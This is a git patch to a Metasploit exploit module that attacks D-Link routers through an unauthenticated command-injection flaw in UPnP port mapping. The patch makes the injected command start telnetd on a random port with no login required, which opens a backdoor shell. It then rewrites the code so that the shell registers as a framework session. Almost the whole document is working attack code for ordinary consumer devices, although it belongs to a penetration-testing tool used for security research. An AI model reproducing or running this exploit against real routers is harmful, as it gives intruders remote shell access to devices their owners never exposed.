From 47ca4fd48f480f8f825a5420e373bb07ef666ae2 Mon Sep 17 00:00:00 2001
From: m-1-k-3 <github@s3cur1ty.de>
Date: Sun, 14 Jul 2013 15:42:41 +0200
Subject: [PATCH] session now working

---
 .../linux/http/dlink_upnp_exec_noauth.rb      | 51 ++++++++++++-------
 1 file changed, 33 insertions(+), 18 deletions(-)

diff --git a/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb b/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb
index e6c762c378..a053d2c346 100644
--- a/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb
+++ b/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb
@@ -58,13 +58,13 @@ class Metasploit3 < Msf::Exploit::Remote
 						'Platform' => 'unix'
 						}
 					],
-					[ 'Telnet',	#all devices
+					[ 'Telnet',	#all devices, use a netcat bind payload for getting a valid session
 						{
 						'Arch' => ARCH_CMD,
 						'Platform' => 'unix'
 						}
 					],
-					[ 'Linux mipsel Payload',	#DIR-865, DIR-645
+					[ 'Linux mipsel Payload',	#DIR-865, DIR-645, and some more
 						{
 						'Arch' => ARCH_MIPSLE,
 						'Platform' => 'linux'
@@ -80,8 +80,8 @@ class Metasploit3 < Msf::Exploit::Remote
 				OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]),
 				OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]),
 				OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60]),
-				OptString.new('TELNETUSER', [false, 'User to start the telnet daemon (default: random)' ]),
-				OptString.new('TELNETPASS', [false, 'User to start the telnet daemon (default: random)' ])
+				#OptString.new('TELNETUSER', [false, 'User to start the telnet daemon (default: random)' ]),
+				#OptString.new('TELNETPASS', [false, 'User to start the telnet daemon (default: random)' ])
 			], self.class)
 	end
 
@@ -144,6 +144,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def exploit
+		handler
 		downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))
 
 		new_portmapping_description = rand_text_alpha(8)
@@ -170,15 +171,16 @@ class Metasploit3 < Msf::Exploit::Remote
 		end
 
 		if target.name =~ /Telnet/
-			passw = datastore['TELNETPASS'] || rand_text_alpha(8)
-			user = datastore['TELNETUSER'] || rand_text_alpha(4)
+			#passw = datastore['TELNETPASS'] || rand_text_alpha(8)
+			#user = datastore['TELNETUSER'] || rand_text_alpha(4)
 			telnetport = rand(65535)
 
-			vprint_status("#{rhost}:#{rport} - User: #{user}")
-			vprint_status("#{rhost}:#{rport} - Password: #{passw}")
+			#vprint_status("#{rhost}:#{rport} - User: #{user}")
+			#vprint_status("#{rhost}:#{rport} - Password: #{passw}")
 			vprint_status("#{rhost}:#{rport} - Telnetport: #{telnetport}")
 
-			cmd = "telnetd -p #{telnetport} -l \"/usr/sbin/login\" -u #{user}:#{passw}"
+			#cmd = "telnetd -p #{telnetport} -l \"/usr/sbin/login\" -u #{user}:#{passw}"
+			cmd = "telnetd -p #{telnetport}"	# -l \"/usr/sbin/login\" -u #{user}:#{passw}"
 			type = "add"
 			res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
 			if (!res or res.code != 200)
@@ -199,13 +201,13 @@ class Metasploit3 < Msf::Exploit::Remote
 					print_error("#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
 				end
 
-				print_status "Attempting to start a Telnet session #{rhost}:#{telnetport} with #{user}:#{passw}"
+				print_status "Attempting to start a Telnet session #{rhost}:#{telnetport}" # with #{user}:#{passw}"
 				auth_info = {
 					:host   => rhost,
 					:port   => telnetport,
 					:sname => 'telnet',
-					:user   => user,
-					:pass	=> passw,
+					#:user   => user,
+					#:pass	=> passw,
 					:source_type => "exploit",
 					:active => true
 				}
@@ -214,13 +216,26 @@ class Metasploit3 < Msf::Exploit::Remote
 					'USERPASS_FILE' => nil,
 					'USER_FILE'     => nil,
 					'PASS_FILE'     => nil,
-					'USERNAME'      => user,
-					'PASSWORD'      => passw
+					#'USERNAME'      => user,
+					#'PASSWORD'      => passw
 				}
-				# NOT WORKING
-				conn = Net::SSH::CommandStream.new(sock, '/bin/sh', true)
-				#puts conn.methods.to_s
-				start_session(self, "TELNET #{user}:#{passw} (#{rhost}:#{telnetport})", merge_me, false, conn.lsock)
+				#taken from ./lib/msf/core/auxiliary/commandshell.rb
+				info = "TELNET (#{rhost}:#{telnetport})"
+		                sess = Msf::Sessions::CommandShell.new(sock)
+				sess.set_from_exploit(self)
+                		sess.info = info
+
+                		# Clean up the stored data
+		                sess.exploit_datastore.merge!(merge_me)
+
+                		# Prevent the socket from being closed
+		                self.sockets.delete(sock)
+                		self.sock = nil if self.respond_to? :sock
+
+		                framework.sessions.register(sess)
+                		sess.process_autoruns(datastore)
+
+		                sess
 			rescue
 				print_error("#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
 			end